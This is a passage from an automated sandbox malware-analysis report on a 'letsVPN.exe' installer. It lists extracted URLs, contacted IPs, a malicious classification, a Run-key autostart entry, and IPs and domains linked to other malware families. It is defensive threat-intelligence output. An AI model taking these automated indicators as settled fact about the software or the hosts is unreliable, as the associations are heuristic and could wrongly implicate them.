                                                                                                                    http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/idenletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-serviceletsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://foo/bar/themes/radiobuttondictionary.bamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%Dletsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.ver)svchost.exe, 0000000C.00000002.3903723313.000001CF4D400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://github.com/dotnetprojects/SVGImageletsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacmlletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://home.pacific.net.sg/~jupbooletsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://rcd.video.sina.com.cn/realtime_pcdesktopsinaplayer_service.exefalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamlLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/countryletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://fontawesome.iohttp://fontawesome.io/license/Copyrightletsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributenameletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typLetsPRO.exe, 00000038.00000002.3996035893.0000000067F67000.00000002.00000001.01000000.0000002A.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://1wm27s.onelink.me/DPiD/s5eizipo-1letsvpn-latest.exe, 00000013.00000003.2827115920.0000000000563000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2212864980.000000000283E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RSTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.xmlspy.com)letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%Bletsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlightingletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actorletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=httsinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.winimage.com/zLibDllnetwork_changesinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://intercom.help/letsvpn-world/en/collections/1628560-help-documentsletsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trusletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Errorletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://foo/app.xamldLetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validateletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                183.60.146.66
                                                                                                                                                                                		unknownChina
                                                                                                                                                                                		134763CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNfalse
                                                                                                                                                                                35.227.223.56
                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                103.235.46.96
                                                                                                                                                                                		www.wshifen.comHong Kong
                                                                                                                                                                                		55967BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdfalse
                                                                                                                                                                                8.223.59.119
                                                                                                                                                                                		unknownSingapore
                                                                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                23.98.101.155
                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                8.217.212.245
                                                                                                                                                                                		unknownSingapore
                                                                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                13.227.9.159
                                                                                                                                                                                		d1dmgcawtbm6l9.cloudfront.netUnited States
                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                8.223.56.120
                                                                                                                                                                                		unknownSingapore
                                                                                                                                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                77.88.55.88
                                                                                                                                                                                		yandex.comRussian Federation
                                                                                                                                                                                		13238YANDEXRUfalse
                                                                                                                                                                                172.217.21.36
                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                18.136.139.158
                                                                                                                                                                                		socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comUnited States
                                                                                                                                                                                		16509AMAZON-02USfalse

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1582024
                                                                                                                                                                                Start date and time:2024-12-29 16:28:03 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 14m 21s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Run name:Run with higher sleep bypass
                                                                                                                                                                                Number of analysed new started processes analysed:75
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:letsVPN.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal62.spre.troj.spyw.evad.winEXE@103/292@9/12
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 71.4%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 67%
                                                                                                                                                                                • Number of executed functions: 24
                                                                                                                                                                                • Number of non-executed functions: 376
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.153.25.42, 2.16.158.50, 2.16.158.75, 2.16.158.80, 2.16.158.40, 2.16.158.192, 2.16.158.26, 2.16.158.82, 2.16.158.48, 2.16.158.33, 142.250.181.46, 13.107.246.63, 4.245.163.56, 20.12.23.50
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, in1-gw2-04-3d6c3051.eastus2.cloudapp.azure.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.google-analytics.com
                                                                                                                                                                                • Execution Graph export aborted for target LetsPRO.exe, PID 4372 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6540 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                16:30:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent
                                                                                                                                                                                16:30:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                183.60.146.66SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                    KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                      KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                        KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  103.235.46.96VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  DNF#U604b#U62180224a.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/s?wd=www.cfjuzi.com&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=utf8speed_dg&inputT=453
                                                                                                                                                                                                  New Al Maktoum International Airport Enquiry Ref #2401249.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                  • www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz
                                                                                                                                                                                                  4.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  3.exeGet hashmaliciousBlackMoon, XRedBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  1.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  f1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/
                                                                                                                                                                                                  SecuriteInfo.com.FileRepMalware.29184.31872.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • www.baidu.com/

                                                                                                                                                                                                  Domains

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  www.wshifen.comInstruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  b6FArHy7yA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  VIP-#U4f1a#U5458#U7248.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  360safe.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  XiaobingOnekey.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  DNF#U604b#U62180224a.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.46.96
                                                                                                                                                                                                  socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comSBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 18.139.76.7
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.140.92.167
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.183.38
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 54.251.31.103
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.183.38
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.169.84
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.183.38
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.136.78.90
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.136.78.90
                                                                                                                                                                                                  d1dmgcawtbm6l9.cloudfront.netSBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.26
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.216
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.187.72
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.44
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.182
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115

                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNsplsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 14.17.77.142
                                                                                                                                                                                                  xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.61.188.99
                                                                                                                                                                                                  sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 211.99.125.149
                                                                                                                                                                                                  owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 211.102.80.218
                                                                                                                                                                                                  jklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.6.228.171
                                                                                                                                                                                                  j2qv9oE81X.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 59.38.96.207
                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 14.17.91.101
                                                                                                                                                                                                  05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 14.17.91.116
                                                                                                                                                                                                  SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 183.60.146.66
                                                                                                                                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCT1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.212.101.195
                                                                                                                                                                                                  T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.212.101.195
                                                                                                                                                                                                  wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                  • 149.129.12.34
                                                                                                                                                                                                  V2clgnyM2J.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                  • 8.218.163.85
                                                                                                                                                                                                  test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                  • 47.90.135.102
                                                                                                                                                                                                  libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                  • 47.254.174.185
                                                                                                                                                                                                  EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.218.163.62
                                                                                                                                                                                                  EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.218.163.62
                                                                                                                                                                                                  xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 47.245.158.74
                                                                                                                                                                                                  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtddb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 106.13.224.246
                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 119.75.215.154
                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.140
                                                                                                                                                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 182.61.224.138
